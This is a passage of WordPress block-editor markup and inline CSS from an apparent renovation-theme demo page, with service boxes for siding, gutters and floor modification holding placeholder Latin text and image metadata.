}\n @media only screen and (min-width: 976px){\n .block-af9e4793-906c-4dfa-bbb9-ebc53b817ade .skt-blocks-block-column{\n padding-top: 50px; padding-bottom: 50px; padding-left: 45px; padding-right: 30px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: 15px; margin-right: 15px; }\n}\n @media only screen and (max-width: 976px){\n .block-af9e4793-906c-4dfa-bbb9-ebc53b817ade .skt-blocks-block-column{\n padding-top: 30px; padding-bottom: 30px; padding-left: 30px; padding-right: 30px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: 10px; margin-right: 10px; }\n}\n @media only screen and (max-width: 767px){\n .block-af9e4793-906c-4dfa-bbb9-ebc53b817ade .skt-blocks-block-column{\n padding-top: 50px; padding-bottom: 50px; padding-left: 45px; padding-right: 30px; margin-top: undefinedpx; margin-bottom: 20px; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-af9e4793-906c-4dfa-bbb9-ebc53b817ade\" style=\"width:50%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none;background-color:rgba(255, 255, 255, 1)\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/info-block {\"resheadingColor\":\"#303030\",\"ressubheadingColor\":\"#494848\",\"resheadFontFamily\":\"Poppins\",\"ressubHeadFontFamily\":\"Poppins\",\"resheadFontSize\":25,\"ressubHeadFontSize\":17,\"ressubHeadFontWeight\":\"400\",\"resheadSpace\":20,\"ressubHeadSpace\":30,\"source_type\":\"image\",\"resseperatorStyle\":\"none\",\"resctaType\":\"text\",\"resctaLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/services/tiling/\",\"resctaLinkColor\":\"#303030\",\"iconTopMargin\":0,\"iconBottomMargin\":35,\"iconImage\":{\"id\":28,\"title\":\"services-img2\",\"filename\":\"services-img2.jpg\",\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/services-img2.jpg\",\"link\":\"https://sktperfectdemo.com/themepack/gbrenovate/services-img2/\",\"alt\":\"\",\"author\":\"1\",\"description\":\"\",\"caption\":\"\",\"name\":\"services-img2\",\"status\":\"inherit\",\"uploadedTo\":0,\"date\":\"2021-05-25T13:48:37.000Z\",\"modified\":\"2021-05-25T13:48:37.000Z\",\"menuOrder\":0,\"mime\":\"image/jpeg\",\"type\":\"image\",\"subtype\":\"jpeg\",\"icon\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-includes/images/media/default.png\",\"dateFormatted\":\"May 25, 2021\",\"nonces\":{\"update\":\"8af869eca5\",\"delete\":\"667bc07c15\",\"edit\":\"3755558faf\"},\"editLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/post.php?post=28u0026action=edit\",\"meta\":false,\"authorName\":\"gbrenovation\",\"authorLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/profile.php\",\"filesizeInBytes\":3796,\"filesizeHumanReadable\":\"4 KB\",\"context\":\"\",\"height\":65,\"width\":77,\"orientation\":\"landscape\",\"sizes\":{\"full\":{\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/services-img2.jpg\",\"height\":65,\"width\":77,\"orientation\":\"landscape\"}},\"compat\":{\"item\":\"\",\"meta\":\"\"}},\"imageWidth\":77,\"resshowPrefix\":false,\"counterId\":\"1d458a4b-40b6-411c-bb6b-0b07fb1d1b4d\"} -->\n<style type=\"text/css\"> .skt-blocks-block-1d458a4b-40b6-411c-bb6b-0b07fb1d1b4d .skt-blocks-ifb-cta-button {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-1d458a4b-40b6-411c-bb6b-0b07fb1d1b4d .skt-blocks-ifb-cta-button .skt-blocks-inline-editing{\n color: #333; }\n .skt-blocks-block-1d458a4b-40b6-411c-bb6b-0b07fb1d1b4d .skt-blocks-ifb-cta-button:hover {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-1d458a4b-40b6-411c-bb6b-0b07fb1d1b4d .skt-blocks-ifb-cta-button .skt-blocks-inline-editing:hover{\n color: #333; }\n .skt-blocks-block-1d458a4b-40b6-411c-bb6b-0b07fb1d1b4d .skt-blocks-ifb-icon svg{\n fill: #3a3a3a; }\n .skt-blocks-block-1d458a4b-40b6-411c-bb6b-0b07fb1d1b4d .skt-blocks-ifb-icon:hover svg{\n fill: #3a3a3a; }\n .skt-blocks-block-1d458a4b-40b6-411c-bb6b-0b07fb1d1b4d .skt-blocks-ifb-image-content img{\n opacity: 1 }\n</style><style type=\"text/css\">\n@media only screen and (min-width: 976px){\n\n.skt-blocks-block-1d458a4b-40b6-411c-bb6b-0b07fb1d1b4d.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: 25px !important; }\n .skt-blocks-block-1d458a4b-40b6-411c-bb6b-0b07fb1d1b4d.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: 17px !important; }\n .skt-blocks-block-1d458a4b-40b6-411c-bb6b-0b07fb1d1b4d .skt-blocks-ifb-image-content img {\n width: 77px; }\n}\n\n@media only screen and (max-width: 976px){\n\n.skt-blocks-block-1d458a4b-40b6-411c-bb6b-0b07fb1d1b4d.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: undefinedpx; }\n .skt-blocks-block-1d458a4b-40b6-411c-bb6b-0b07fb1d1b4d.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: undefinedpx !important; }\n .skt-blocks-block-1d458a4b-40b6-411c-bb6b-0b07fb1d1b4d .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n\n@media only screen and (max-width: 767px){\n .skt-blocks-block-1d458a4b-40b6-411c-bb6b-0b07fb1d1b4d.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: undefinedpx; }\n .skt-blocks-block-1d458a4b-40b6-411c-bb6b-0b07fb1d1b4d.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: undefinedpx !important; }\n .skt-blocks-block-1d458a4b-40b6-411c-bb6b-0b07fb1d1b4d .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n</style><style type=\"text/css\"> .skt-blocks-block-1d458a4b-40b6-411c-bb6b-0b07fb1d1b4d.skt-blocks-infobox__content-wrap {\n text-align: center; }\n</style><div class=\"skt-blocks-infobox__outer-wrap responsive-blocks-block-team\" style=\"border-width:1px;background-color:rgba(255, 255, 255, 1);padding:0;border-style:none;box-shadow:0px 0px   undefined \"><div class=\"skt-blocks-block-1d458a4b-40b6-411c-bb6b-0b07fb1d1b4d skt-blocks-infobox__content-wrap skt-blocks-infobox skt-blocks-infobox-has-image skt-blocks-infobox-icon-above-title skt-blocks-infobox-image-valign-top skt-blocks-infobox-enable-border-radius \"><div class=\"skt-blocks-ifb-left-right-wrap\"><div class=\"skt-blocks-ifb-content\"><div class=\"skt-blocks-ifb-image-icon-content skt-blocks-ifb-imgicon-wrap\" style=\"margin-bottom:35px;margin-top:0;margin-left:0;margin-right:0\"><div class=\"skt-blocks-ifb-image\"><div class=\"skt-blocks-ifb-image-content\"><img class=\"\" src=\"https://cteisys.com/wp-content/uploads/2021/05/services-img2.jpg\" alt=\"\" style=\"border-color:#333;border-radius:0;border-width:2px;border-style:none;box-shadow:0px 0px   undefined \"/></div></div></div><div class=\"skt-blocks-ifb-title-wrap\"><h3 class=\"skt-blocks-ifb-title\" style=\"color:#303030;font-weight:700;font-family:Poppins;margin-bottom:20px\">Siding</h3></div><div class=\"skt-blocks-ifb-text-wrap\"><p class=\"skt-blocks-ifb-desc\" style=\"color:#494848;font-family:Poppins;font-weight:400;margin-bottom:30px\">Posuere tellus imperdiet facilisis. Curabitur vaucibusy.</p><div class=\"skt-blocks-ifb-cta skt-blocks-infobox-cta-link-style\"><a href=\"https://sktperfectdemo.com/themepack/gbrenovate/services/tiling/\" target=\"_self\" class=\"skt-blocks-infobox-cta-link\" rel=\"noopener noreferrer\" style=\"color:#303030;padding-top:10px;padding-bottom:10px;padding-left:14px;padding-right:14px\"><span class=\"skt-blocks-inline-editing\" style=\"color:#303030\">Read More</span></a></div></div></div></div></div></div>\n<!-- /wp:skt-blocks/info-block --></div></div></div>\n<!-- /wp:skt-blocks/column -->\n\n<!-- wp:skt-blocks/column {\"topPadding\":50,\"bottomPadding\":50,\"leftPadding\":45,\"rightPadding\":30,\"leftMargin\":15,\"rightMargin\":15,\"topPaddingTablet\":30,\"bottomPaddingTablet\":30,\"leftPaddingTablet\":30,\"rightPaddingTablet\":30,\"leftMarginTablet\":10,\"rightMarginTablet\":10,\"topPaddingMobile\":50,\"bottomPaddingMobile\":50,\"leftPaddingMobile\":45,\"rightPaddingMobile\":30,\"bottomMarginMobile\":2,\"blockId\":\"ac47cadc-3d5a-40f8-bad4-2d7510e7b898\",\"opacity\":100,\"backgroundType\":\"color\",\"backgroundColor\":\"#ffffff\"} -->\n<style type=\"text/css\"> .block-ac47cadc-3d5a-40f8-bad4-2d7510e7b898 .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-ac47cadc-3d5a-40f8-bad4-2d7510e7b898 .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-ac47cadc-3d5a-40f8-bad4-2d7510e7b898 .skt-blocks-block-column{\n padding-top: 50px; padding-bottom: 50px; padding-left: 45px; padding-right: 30px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: 15px; margin-right: 15px; }\n}\n @media only screen and (max-width: 976px){\n .block-ac47cadc-3d5a-40f8-bad4-2d7510e7b898 .skt-blocks-block-column{\n padding-top: 30px; padding-bottom: 30px; padding-left: 30px; padding-right: 30px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: 10px; margin-right: 10px; }\n}\n @media only screen and (max-width: 767px){\n .block-ac47cadc-3d5a-40f8-bad4-2d7510e7b898 .skt-blocks-block-column{\n padding-top: 50px; padding-bottom: 50px; padding-left: 45px; padding-right: 30px; margin-top: undefinedpx; margin-bottom: 2px; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-ac47cadc-3d5a-40f8-bad4-2d7510e7b898\" style=\"width:50%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none;background-color:rgba(255, 255, 255, 1)\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/info-block {\"resheadingColor\":\"#303030\",\"ressubheadingColor\":\"#494848\",\"resheadFontFamily\":\"Poppins\",\"ressubHeadFontFamily\":\"Poppins\",\"resheadFontSize\":25,\"ressubHeadFontSize\":17,\"ressubHeadFontWeight\":\"400\",\"resheadSpace\":20,\"ressubHeadSpace\":30,\"source_type\":\"image\",\"resseperatorStyle\":\"none\",\"resctaType\":\"text\",\"resctaLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/services/painting/\",\"resctaLinkColor\":\"#303030\",\"iconTopMargin\":0,\"iconBottomMargin\":35,\"iconImage\":{\"id\":29,\"title\":\"services-img3\",\"filename\":\"services-img3.jpg\",\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/services-img3.jpg\",\"link\":\"https://sktperfectdemo.com/themepack/gbrenovate/services-img3/\",\"alt\":\"\",\"author\":\"1\",\"description\":\"\",\"caption\":\"\",\"name\":\"services-img3\",\"status\":\"inherit\",\"uploadedTo\":0,\"date\":\"2021-05-25T13:48:37.000Z\",\"modified\":\"2021-05-25T13:48:37.000Z\",\"menuOrder\":0,\"mime\":\"image/jpeg\",\"type\":\"image\",\"subtype\":\"jpeg\",\"icon\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-includes/images/media/default.png\",\"dateFormatted\":\"May 25, 2021\",\"nonces\":{\"update\":\"1df582acb1\",\"delete\":\"75ddbb8dd1\",\"edit\":\"b8f84e66c7\"},\"editLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/post.php?post=29u0026action=edit\",\"meta\":false,\"authorName\":\"gbrenovation\",\"authorLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/profile.php\",\"filesizeInBytes\":2302,\"filesizeHumanReadable\":\"2 KB\",\"context\":\"\",\"height\":67,\"width\":59,\"orientation\":\"portrait\",\"sizes\":{\"full\":{\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/services-img3.jpg\",\"height\":67,\"width\":59,\"orientation\":\"portrait\"}},\"compat\":{\"item\":\"\",\"meta\":\"\"}},\"imageWidth\":59,\"resshowPrefix\":false,\"counterId\":\"5babfb35-1296-4ca0-b5db-01d178d15440\"} -->\n<style type=\"text/css\"> .skt-blocks-block-5babfb35-1296-4ca0-b5db-01d178d15440 .skt-blocks-ifb-cta-button {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-5babfb35-1296-4ca0-b5db-01d178d15440 .skt-blocks-ifb-cta-button .skt-blocks-inline-editing{\n color: #333; }\n .skt-blocks-block-5babfb35-1296-4ca0-b5db-01d178d15440 .skt-blocks-ifb-cta-button:hover {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-5babfb35-1296-4ca0-b5db-01d178d15440 .skt-blocks-ifb-cta-button .skt-blocks-inline-editing:hover{\n color: #333; }\n .skt-blocks-block-5babfb35-1296-4ca0-b5db-01d178d15440 .skt-blocks-ifb-icon svg{\n fill: #3a3a3a; }\n .skt-blocks-block-5babfb35-1296-4ca0-b5db-01d178d15440 .skt-blocks-ifb-icon:hover svg{\n fill: #3a3a3a; }\n .skt-blocks-block-5babfb35-1296-4ca0-b5db-01d178d15440 .skt-blocks-ifb-image-content img{\n opacity: 1 }\n</style><style type=\"text/css\">\n@media only screen and (min-width: 976px){\n\n.skt-blocks-block-5babfb35-1296-4ca0-b5db-01d178d15440.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: 25px !important; }\n .skt-blocks-block-5babfb35-1296-4ca0-b5db-01d178d15440.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: 17px !important; }\n .skt-blocks-block-5babfb35-1296-4ca0-b5db-01d178d15440 .skt-blocks-ifb-image-content img {\n width: 59px; }\n}\n\n@media only screen and (max-width: 976px){\n\n.skt-blocks-block-5babfb35-1296-4ca0-b5db-01d178d15440.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: undefinedpx; }\n .skt-blocks-block-5babfb35-1296-4ca0-b5db-01d178d15440.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: undefinedpx !important; }\n .skt-blocks-block-5babfb35-1296-4ca0-b5db-01d178d15440 .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n\n@media only screen and (max-width: 767px){\n .skt-blocks-block-5babfb35-1296-4ca0-b5db-01d178d15440.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: undefinedpx; }\n .skt-blocks-block-5babfb35-1296-4ca0-b5db-01d178d15440.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: undefinedpx !important; }\n .skt-blocks-block-5babfb35-1296-4ca0-b5db-01d178d15440 .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n</style><style type=\"text/css\"> .skt-blocks-block-5babfb35-1296-4ca0-b5db-01d178d15440.skt-blocks-infobox__content-wrap {\n text-align: center; }\n</style><div class=\"skt-blocks-infobox__outer-wrap responsive-blocks-block-team\" style=\"border-width:1px;background-color:rgba(255, 255, 255, 1);padding:0;border-style:none;box-shadow:0px 0px   undefined \"><div class=\"skt-blocks-block-5babfb35-1296-4ca0-b5db-01d178d15440 skt-blocks-infobox__content-wrap skt-blocks-infobox skt-blocks-infobox-has-image skt-blocks-infobox-icon-above-title skt-blocks-infobox-image-valign-top skt-blocks-infobox-enable-border-radius \"><div class=\"skt-blocks-ifb-left-right-wrap\"><div class=\"skt-blocks-ifb-content\"><div class=\"skt-blocks-ifb-image-icon-content skt-blocks-ifb-imgicon-wrap\" style=\"margin-bottom:35px;margin-top:0;margin-left:0;margin-right:0\"><div class=\"skt-blocks-ifb-image\"><div class=\"skt-blocks-ifb-image-content\"><img class=\"\" src=\"https://cteisys.com/wp-content/uploads/2021/05/services-img3.jpg\" alt=\"\" style=\"border-color:#333;border-radius:0;border-width:2px;border-style:none;box-shadow:0px 0px   undefined \"/></div></div></div><div class=\"skt-blocks-ifb-title-wrap\"><h3 class=\"skt-blocks-ifb-title\" style=\"color:#303030;font-weight:700;font-family:Poppins;margin-bottom:20px\">Gutters</h3></div><div class=\"skt-blocks-ifb-text-wrap\"><p class=\"skt-blocks-ifb-desc\" style=\"color:#494848;font-family:Poppins;font-weight:400;margin-bottom:30px\">Posuere tellus imperdiet facilisis. Curabitur vaucibusy.</p><div class=\"skt-blocks-ifb-cta skt-blocks-infobox-cta-link-style\"><a href=\"https://sktperfectdemo.com/themepack/gbrenovate/services/painting/\" target=\"_self\" class=\"skt-blocks-infobox-cta-link\" rel=\"noopener noreferrer\" style=\"color:#303030;padding-top:10px;padding-bottom:10px;padding-left:14px;padding-right:14px\"><span class=\"skt-blocks-inline-editing\" style=\"color:#303030\">Read More</span></a></div></div></div></div></div></div>\n<!-- /wp:skt-blocks/info-block --></div></div></div>\n<!-- /wp:skt-blocks/column --></div></div></div></div>\n<!-- /wp:skt-blocks/advance-columns --></div></section></div>\n<!-- /wp:skt-blocks/section -->\n\n<!-- wp:skt-blocks/section {\"contentWidth\":\"full_width\",\"blockId\":\"6a6f7893-59bb-4925-bdaa-e0b06bedc4e7\",\"topPadding\":30,\"bottomPadding\":0,\"leftPadding\":0,\"rightPadding\":0,\"className\":\"gb-renovation-services\"} -->\n<div class=\"wp-block-skt-blocks-section gb-renovation-services skt-blocks-block-section-outer-wrap block-6a6f7893-59bb-4925-bdaa-e0b06bedc4e7 background-type-none alignundefined\" style=\"z-index:1;max-width:;margin-left:;margin-right:\"><style type=\"text/css\"> @media only screen and (max-width: 976px){\n .block-6a6f7893-59bb-4925-bdaa-e0b06bedc4e7 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 10px; padding-bottom: 10px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (max-width: 767px){\n .block-6a6f7893-59bb-4925-bdaa-e0b06bedc4e7 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 10px; padding-bottom: 10px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (min-width: 976px){\n .block-6a6f7893-59bb-4925-bdaa-e0b06bedc4e7 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 30px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; }\n}\n .block-6a6f7893-59bb-4925-bdaa-e0b06bedc4e7.skt-blocks-block-section-outer-wrap.background-type-image{\n background-image: linear-gradient(rgba(255, 255, 255, 0.2),rgba(255, 255, 255, 0.2)),url(undefined); background-position: center-center; background-attachment: scroll; background-repeat: no-repeat; background-size: cover; border-radius: 0px; }\n .block-6a6f7893-59bb-4925-bdaa-e0b06bedc4e7.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-color{\n background-color: rgba(255, 255, 255, 0.2); }\n .block-6a6f7893-59bb-4925-bdaa-e0b06bedc4e7.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 0.2) 0%, rgba(255, 255, 255, 0.2) 100%); }\n .block-6a6f7893-59bb-4925-bdaa-e0b06bedc4e7.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 0.2) 0%, rgba(255, 255, 255, 0.2) 100%); }\n .block-6a6f7893-59bb-4925-bdaa-e0b06bedc4e7.background-type-video .skt-blocks-block-section {\n background-color: rgba(255, 255, 255, 0.2); }\n</style><style type=\"text/css\"> .block-6a6f7893-59bb-4925-bdaa-e0b06bedc4e7 .responsive-section-inner-wrap {\n max-width : 100%; }\n @media only screen and (min-width: 976px){\n .block-6a6f7893-59bb-4925-bdaa-e0b06bedc4e7 .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-6a6f7893-59bb-4925-bdaa-e0b06bedc4e7.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n @media only screen and (max-width: 976px){\n .block-6a6f7893-59bb-4925-bdaa-e0b06bedc4e7 .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-6a6f7893-59bb-4925-bdaa-e0b06bedc4e7.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n @media only screen and (max-width: 767px){\n .block-6a6f7893-59bb-4925-bdaa-e0b06bedc4e7 .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-6a6f7893-59bb-4925-bdaa-e0b06bedc4e7.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n</style><section class=\"responsive-section-wrap skt-blocks-block-section overlay-type-color linear\" style=\"border-width:1px;border-style:none;border-radius:0;box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-section-inner-wrap\" style=\"z-index:1\"><!-- wp:skt-blocks/advance-columns {\"columns\":3,\"topPadding\":0,\"bottomPadding\":0,\"leftPadding\":0,\"rightPadding\":0,\"opacity\":0,\"blockId\":\"abb180d8-6220-4fbd-8b13-9b1a01abc33b\"} -->\n<style type=\"text/css\"> .block-abb180d8-6220-4fbd-8b13-9b1a01abc33b .skt-blocks-block-columns.overlay-type-color{\n background-color: rgba(255, 255, 255, 0); }\n .block-abb180d8-6220-4fbd-8b13-9b1a01abc33b .skt-blocks-block-columns.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-abb180d8-6220-4fbd-8b13-9b1a01abc33b .skt-blocks-block-columns.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-abb180d8-6220-4fbd-8b13-9b1a01abc33b .skt-blocks-block-column{\n min-height: ; align-items: flex-start; }\n @media only screen and (min-width: 976px){\n .block-abb180d8-6220-4fbd-8b13-9b1a01abc33b .skt-blocks-block-columns{\n padding-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; margin-top: 0px; margin-bottom: 0px; }\n}\n @media only screen and (max-width: 976px){\n .block-abb180d8-6220-4fbd-8b13-9b1a01abc33b .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-abb180d8-6220-4fbd-8b13-9b1a01abc33b .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n</style><div class=\"block-abb180d8-6220-4fbd-8b13-9b1a01abc33b skt-blocks-advanced-column-outer-wrap undefined\" style=\"z-index:1\"><div class=\"skt-blocks-advanced-column alignundefined\"><div class=\"responsive-columns-wrap skt-blocks-block-columns responsive-columns__gap-default responsive-columns__stack-mobile responsive-columns__content-width-theme overlay-type-color linear\" style=\"text-align:left;border-width:1px;border-style:none;box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-columns-inner-wrap responsive-columns-columns-3\" style=\"max-width:100%\"><!-- wp:skt-blocks/column {\"topPadding\":50,\"bottomPadding\":50,\"leftPadding\":45,\"rightPadding\":30,\"leftMargin\":15,\"rightMargin\":15,\"topPaddingTablet\":30,\"bottomPaddingTablet\":30,\"leftPaddingTablet\":30,\"rightPaddingTablet\":30,\"leftMarginTablet\":10,\"rightMarginTablet\":10,\"topPaddingMobile\":50,\"bottomPaddingMobile\":50,\"leftPaddingMobile\":45,\"rightPaddingMobile\":30,\"bottomMarginMobile\":20,\"blockId\":\"1dbb8474-65d4-483c-84d0-b75c10b9a9a0\",\"blockBorderRadius\":5,\"opacity\":100,\"backgroundType\":\"color\",\"backgroundColor\":\"#ffffff\"} -->\n<style type=\"text/css\"> .block-1dbb8474-65d4-483c-84d0-b75c10b9a9a0 .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-1dbb8474-65d4-483c-84d0-b75c10b9a9a0 .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-1dbb8474-65d4-483c-84d0-b75c10b9a9a0 .skt-blocks-block-column{\n padding-top: 50px; padding-bottom: 50px; padding-left: 45px; padding-right: 30px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: 15px; margin-right: 15px; }\n}\n @media only screen and (max-width: 976px){\n .block-1dbb8474-65d4-483c-84d0-b75c10b9a9a0 .skt-blocks-block-column{\n padding-top: 30px; padding-bottom: 30px; padding-left: 30px; padding-right: 30px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: 10px; margin-right: 10px; }\n}\n @media only screen and (max-width: 767px){\n .block-1dbb8474-65d4-483c-84d0-b75c10b9a9a0 .skt-blocks-block-column{\n padding-top: 50px; padding-bottom: 50px; padding-left: 45px; padding-right: 30px; margin-top: undefinedpx; margin-bottom: 20px; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-1dbb8474-65d4-483c-84d0-b75c10b9a9a0\" style=\"width:50%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none;border-radius:5px;background-color:rgba(255, 255, 255, 1)\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/info-block {\"resheadingColor\":\"#303030\",\"ressubheadingColor\":\"#494848\",\"resheadingTag\":\"h4\",\"resheadFontFamily\":\"Poppins\",\"ressubHeadFontFamily\":\"Poppins\",\"resheadFontSize\":25,\"ressubHeadFontSize\":17,\"ressubHeadFontWeight\":\"400\",\"resheadSpace\":20,\"ressubHeadSpace\":30,\"source_type\":\"image\",\"resseperatorStyle\":\"none\",\"resctaType\":\"text\",\"resctaLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/floor-modification/\",\"iconTopMargin\":0,\"iconBottomMargin\":35,\"iconImage\":{\"uploading\":false,\"date\":\"2021-05-28T05:39:15.000Z\",\"filename\":\"floor-modification.jpg\",\"menuOrder\":0,\"uploadedTo\":7,\"type\":\"image\",\"subtype\":\"jpeg\",\"alt\":\"\",\"title\":\"floor-modification\",\"caption\":\"\",\"description\":\"\",\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/floor-modification.jpg\",\"id\":258,\"link\":\"https://sktperfectdemo.com/themepack/gbrenovate/home/floor-modification/\",\"author\":\"1\",\"name\":\"floor-modification\",\"status\":\"inherit\",\"modified\":\"2021-05-28T05:39:15.000Z\",\"mime\":\"image/jpeg\",\"icon\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-includes/images/media/default.png\",\"dateFormatted\":\"May 28, 2021\",\"nonces\":{\"update\":\"dc1b7f19b6\",\"delete\":\"1f29bf8951\",\"edit\":\"ed86f5af8b\"},\"editLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/post.php?post=258u0026action=edit\",\"meta\":false,\"authorName\":\"gbrenovation\",\"authorLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/profile.php\",\"uploadedToTitle\":\"Home\",\"uploadedToLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/post.php?post=7u0026action=edit\",\"filesizeInBytes\":9306,\"filesizeHumanReadable\":\"9 KB\",\"context\":\"\",\"height\":66,\"width\":111,\"orientation\":\"landscape\",\"sizes\":{\"full\":{\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/floor-modification.jpg\",\"height\":66,\"width\":111,\"orientation\":\"landscape\"}},\"compat\":{\"item\":\"\",\"meta\":\"\"}},\"imageWidth\":111,\"resshowPrefix\":false,\"counterId\":\"5d2675a4-fe64-46db-a12e-a5099cf66e81\"} -->\n<style type=\"text/css\"> .skt-blocks-block-5d2675a4-fe64-46db-a12e-a5099cf66e81 .skt-blocks-ifb-cta-button {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-5d2675a4-fe64-46db-a12e-a5099cf66e81 .skt-blocks-ifb-cta-button .skt-blocks-inline-editing{\n color: #333; }\n .skt-blocks-block-5d2675a4-fe64-46db-a12e-a5099cf66e81 .skt-blocks-ifb-cta-button:hover {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-5d2675a4-fe64-46db-a12e-a5099cf66e81 .skt-blocks-ifb-cta-button .skt-blocks-inline-editing:hover{\n color: #333; }\n .skt-blocks-block-5d2675a4-fe64-46db-a12e-a5099cf66e81 .skt-blocks-ifb-icon svg{\n fill: #3a3a3a; }\n .skt-blocks-block-5d2675a4-fe64-46db-a12e-a5099cf66e81 .skt-blocks-ifb-icon:hover svg{\n fill: #3a3a3a; }\n .skt-blocks-block-5d2675a4-fe64-46db-a12e-a5099cf66e81 .skt-blocks-ifb-image-content img{\n opacity: 1 }\n</style><style type=\"text/css\">\n@media only screen and (min-width: 976px){\n\n.skt-blocks-block-5d2675a4-fe64-46db-a12e-a5099cf66e81.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: 25px !important; }\n .skt-blocks-block-5d2675a4-fe64-46db-a12e-a5099cf66e81.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: 17px !important; }\n 